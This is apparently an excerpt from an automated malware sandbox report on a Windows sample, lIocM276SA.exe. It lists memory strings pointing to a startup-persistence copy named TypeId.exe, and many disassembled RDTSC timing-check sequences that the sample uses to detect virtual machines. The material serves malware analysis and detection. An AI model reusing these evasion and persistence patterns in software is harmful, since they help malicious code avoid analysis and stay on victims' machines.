Source: TypeId.exe, 0000003B.00000002.2610702468.0000000001330000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE" C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEWINSTA0\DEFAULT,=
Source: TypeId.exe, 0000003B.00000002.2616387171.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^Q0C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE.CONFIG

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 33F538 second address: 33F577 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F77A0BA2875h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007F77A0BA2871h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F77A0BA286Dh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B3AEB second address: 4B3B0E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F77A0B95E17h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B3EC3 second address: 4B3EDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 js 00007F77A0BA2866h 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B3EDB second address: 4B3EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B4158 second address: 4B415C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B415C second address: 4B4162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B4162 second address: 4B419A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007F77A0BA2877h 0x0000000d jmp 00007F77A0BA286Fh 0x00000012 js 00007F77A0BA286Eh 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B62A4 second address: 4B62FE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F77A0B95E16h 0x00000008 jmp 00007F77A0B95E10h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 mov cl, 1Ah 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F77A0B95E08h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 jno 00007F77A0B95E0Ah 0x00000036 push 692D730Dh 0x0000003b push eax 0x0000003c push edx 0x0000003d jl 00007F77A0B95E0Ch 0x00000043 jp 00007F77A0B95E06h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B62FE second address: 4B6308 instructions: 0x00000000 rdtsc 0x00000002 je 00007F77A0BA286Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B6308 second address: 4B63A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 692D738Dh 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F77A0B95E08h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D2FF2h], ebx 0x0000002d push 00000003h 0x0000002f and di, CB91h 0x00000034 push 00000000h 0x00000036 and di, 41DAh 0x0000003b jns 00007F77A0B95E06h 0x00000041 push 00000003h 0x00000043 and esi, dword ptr [ebp+122D3A75h] 0x00000049 push 6B643A1Ch 0x0000004e push edx 0x0000004f pushad 0x00000050 jmp 00007F77A0B95E0Fh 0x00000055 jmp 00007F77A0B95E14h 0x0000005a popad 0x0000005b pop edx 0x0000005c add dword ptr [esp], 549BC5E4h 0x00000063 mov dword ptr [ebp+122D3351h], esi 0x00000069 lea ebx, dword ptr [ebp+1244B1BAh] 0x0000006f mov ecx, dword ptr [ebp+122D3C09h] 0x00000075 xchg eax, ebx 0x00000076 push edi 0x00000077 push eax 0x00000078 push edx 0x00000079 jmp 00007F77A0B95E0Ah 0x0000007e rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B63A9 second address: 4B63AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B63AD second address: 4B63D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a jmp 00007F77A0B95E17h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007F77A0B95E06h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B647A second address: 4B6488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77A0BA286Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B6488 second address: 4B64A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B64A9 second address: 4B64AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B64AD second address: 4B64C2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push ebx 0x0000000b jnl 00007F77A0B95E06h 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B64C2 second address: 4B64EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77A0BA286Eh 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007F77A0BA286Bh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B64EB second address: 4B6566 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov ecx, dword ptr [ebp+122D2DDCh] 0x00000010 push 00000003h 0x00000012 mov ecx, dword ptr [ebp+122D2DDCh] 0x00000018 jmp 00007F77A0B95E0Ah 0x0000001d push 00000000h 0x0000001f xor cx, 463Ch 0x00000024 push 00000003h 0x00000026 or ecx, 52B99781h 0x0000002c xor dword ptr [ebp+122D3831h], esi 0x00000032 call 00007F77A0B95E09h 0x00000037 pushad 0x00000038 jmp 00007F77A0B95E0Ah 0x0000003d jmp 00007F77A0B95E15h 0x00000042 popad 0x00000043 push eax 0x00000044 pushad 0x00000045 pushad 0x00000046 jng 00007F77A0B95E06h 0x0000004c pushad 0x0000004d popad 0x0000004e popad 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B6566 second address: 4B6592 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F77A0BA2866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push ecx 0x00000011 jo 00007F77A0BA2866h 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F77A0BA2872h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B6592 second address: 4B65A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B65A0 second address: 4B65A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4B65A4 second address: 4B65FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 lea ebx, dword ptr [ebp+1244B1C3h] 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F77A0B95E08h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 mov dword ptr [ebp+122D2DD0h], esi 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F77A0B95E18h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4C7CA1 second address: 4C7CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D6D0A second address: 4D6D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77A0B95E0Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D6D1D second address: 4D6D21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D6D21 second address: 4D6D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D6D27 second address: 4D6D31 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F77A0BA286Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D6D31 second address: 4D6D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F77A0B95E29h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D6D41 second address: 4D6D45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D6D45 second address: 4D6D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D4E43 second address: 4D4E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D4E47 second address: 4D4E8C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F77A0B95E06h 0x00000008 jmp 00007F77A0B95E11h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jo 00007F77A0B95E06h 0x00000016 jg 00007F77A0B95E06h 0x0000001c jmp 00007F77A0B95E10h 0x00000021 jmp 00007F77A0B95E0Ch 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D4E8C second address: 4D4E91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D4E91 second address: 4D4E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D4FD7 second address: 4D4FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D4FDB second address: 4D4FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77A0B95E14h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D4FF9 second address: 4D5003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F77A0BA2866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D53A5 second address: 4D53AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D53AB second address: 4D53B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D53B4 second address: 4D53BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D53BA second address: 4D53C0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D5511 second address: 4D5532 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E18h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D5532 second address: 4D5561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77A0BA286Bh 0x00000009 jmp 00007F77A0BA286Dh 0x0000000e popad 0x0000000f js 00007F77A0BA286Ch 0x00000015 popad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D5561 second address: 4D5565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D5565 second address: 4D5569 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D5691 second address: 4D5695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D5909 second address: 4D5911 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D5911 second address: 4D5918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D5D43 second address: 4D5D59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA2872h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D5D59 second address: 4D5D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4CBEBE second address: 4CBED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77A0BA286Ch 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 49F79D second address: 49F7A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D5EE2 second address: 4D5EF8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F77A0BA2870h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D6742 second address: 4D6768 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F77A0B95E0Bh 0x00000008 jmp 00007F77A0B95E11h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D68C6 second address: 4D68CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D68CF second address: 4D68E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 jmp 00007F77A0B95E0Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D6B88 second address: 4D6BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jnl 00007F77A0BA286Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F77A0BA2876h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D6BB3 second address: 4D6BCA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F77A0B95E06h 0x0000000f jo 00007F77A0B95E06h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D6BCA second address: 4D6BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push ebx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D96A9 second address: 4D96AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D9CE3 second address: 4D9D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007F77A0BA2873h 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D9D07 second address: 4D9D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D9D0B second address: 4D9D11 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D9D11 second address: 4D9D17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D9D17 second address: 4D9D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D9D1B second address: 4D9D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D9D1F second address: 4D9D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F77A0BA286Bh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E132B second address: 4E1331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E1331 second address: 4E1337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E06DF second address: 4E06E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E06E3 second address: 4E06ED instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F77A0BA2866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E06ED second address: 4E06F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E1058 second address: 4E1062 instructions: 0x00000000 rdtsc 0x00000002 js 00007F77A0BA2866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E1062 second address: 4E106C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E49F5 second address: 4E49FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E4A77 second address: 4E4A8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E4A8C second address: 4E4A96 instructions: 0x00000000 rdtsc 0x00000002 je 00007F77A0BA286Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E8557 second address: 4E85AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F77A0B95E08h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov di, bx 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a xchg eax, ebx 0x0000002b jmp 00007F77A0B95E17h 0x00000030 push eax 0x00000031 push ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E85AA second address: 4E85AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E831C second address: 4E832D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77A0B95E0Dh 0x00000009 rdtsc
